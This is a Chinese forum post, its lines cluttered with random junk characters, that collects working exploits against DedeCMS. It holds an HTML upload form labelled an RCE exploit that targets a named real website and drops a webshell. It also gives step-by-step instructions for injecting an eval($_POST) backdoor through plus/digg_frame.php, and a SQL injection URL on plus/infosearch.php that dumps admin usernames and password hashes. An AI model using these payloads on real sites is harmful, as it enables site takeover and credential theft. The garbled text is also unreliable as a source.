0 R0 d% ~0 X7 X7 U& e8 }0 O( C/ Z" }

+ ?. @- z4 q$ M6 r
% g" r% N3 l+ w. R2 e0 C9 @# y
& f5 B4 n+ c2 H, o* J+ P! G" z* D; k% c1 n' v
! c) z. F. Y# \! s0 p

1 ?; m- r5 ?1 I$ ^2 |0 }5 S8 u
( s5 W( x( a  T% }) i- E  g) y织梦(Dedecms)select_soft_post.php页面变量未初始漏洞$ a9 ?% W, N1 g, M' Z: _9 Q
<html>
1 T5 H$ n! C4 n& e+ t- X<head>$ G" V; K: p2 O' N3 H
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>1 I& Q  k2 E5 ]! M$ Z$ R% A
</head>4 @1 x; R  g+ i4 n
<body style="FONT-SIZE: 9pt"># f5 p2 X& M+ `" d- v, r* K
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
6 ~6 D) B% i1 ~, D! x. Z6 s0 r<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
, W) p) i/ r$ D" G; q<input type='hidden' name='activepath' value='/data/cache/' />0 |1 m+ ]; P1 H+ ?# \
<input type='hidden' name='cfg_basedir' value='../../' />. w& g! B+ u6 s; O) ?
<input type='hidden' name='cfg_imgtype' value='php' />
0 \; R9 C/ i8 t0 @( e* K+ c<input type='hidden' name='cfg_not_allowall' value='txt' />( }! t7 B2 z9 k2 j: j, K
<input type='hidden' name='cfg_softtype' value='php' />% j0 Y8 G6 V2 O: F+ W
<input type='hidden' name='cfg_mediatype' value='php' />; a4 S; a" M$ \  B$ e0 W
<input type='hidden' name='f' value='form1.enclosure' />
1 o) f6 m- U. ?/ ^/ O<input type='hidden' name='job' value='upload' />
4 f/ W# g( m$ V$ m0 a<input type='hidden' name='newname' value='fly.php' />& @1 O& L9 P! u9 F1 b
Select U Shell <input type='file' name='uploadfile' size='25' />0 U) i" a9 `3 Y- m3 h/ @
<input type='submit' name='sb1' value='确定' />! t- ^4 a; A+ H, S- d& R' `
</form>
+ ^* h6 R  u6 A9 [: ?<br />It's just a exp for the bug of Dedecms V55...<br />/ v  O7 ?/ y* y; i; T# g
Need register_globals = on...<br />
0 F$ m& t/ c# X% c* J. CFun the game,get a webshell at /data/cache/fly.php...<br />0 h9 v; o. j3 E7 W0 V: Z! J
</body>' z. P# v# y. h& ]
</html>: y. a' x( X0 c% ]* S
8 a6 v7 A) y4 Q* I0 d4 @
6 L2 f! c4 ?0 H& U. J6 t$ T
; B' Q+ @4 P$ g

& f5 P5 ~2 c9 ]* ^
% o( B- P0 U( \6 x) f0 F5 Y+ j4 k( t+ J- K5 }* R! U
! k4 [! X# \, N# l- a

- z0 ^/ {+ G2 M1 C' a" l* T# @, D9 N7 L2 K  u% b
3 {; O+ [0 f) o3 F6 s
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞  Q( |: u( B, p! W5 r& ~
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
; X; H. L9 P" l& k' G1. 访问网址:7 a% M. i; e* y$ S" j  i
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
) N0 I$ ]; E5 z8 E: U- @* I$ y" L可看见错误信息
$ w2 c% ?' `( c3 J/ [
" [+ S) G! D0 `$ O) Z* e
$ A2 p, m& A2 H2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
0 r" H6 h2 ^3 e" j7 P/ S+ Eint(3) Error: Illegal double '1024e1024' value found during parsing4 B* k9 P- J! E/ M
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
9 |, s2 A" _, J; v. I$ @! i5 l% S! \- u( H% Y5 z

; E; x% Z; h1 v3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是* b5 \' e, y& `. U* s" X

- f  d# d' |; G( t, m1 T( M
- E9 }1 @( X+ v: S( r<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
1 f2 B) F- t) Y- w, @! k) \' V, J! F+ D1 Y, o( U
& d5 S; p% v! k/ s) _7 X
按确定后的看到第2步骤的信息表示文件木马上传成功.7 m! J: p% s4 f4 l  T

2 F& x  A2 T( r! l8 g
% s! k& d/ E) N7 k% S+ g
. }* k: q2 \7 ?1 N' C4 a+ O# j  b) Y5 F( Z9 o9 _  j

: f9 q4 r7 f' c0 L+ Z' I; ^9 M6 {& X* O& x
! j2 T9 N# o# m
: S+ ?0 t3 Q1 K1 w9 P
0 x! b+ }) O/ ?. j
6 f7 n8 {# _4 P; u. K" y
5 C. r  }- u1 H2 j& I
1 h9 p7 b8 X6 f0 u, b
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
& y# u0 e) r- l( Mhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表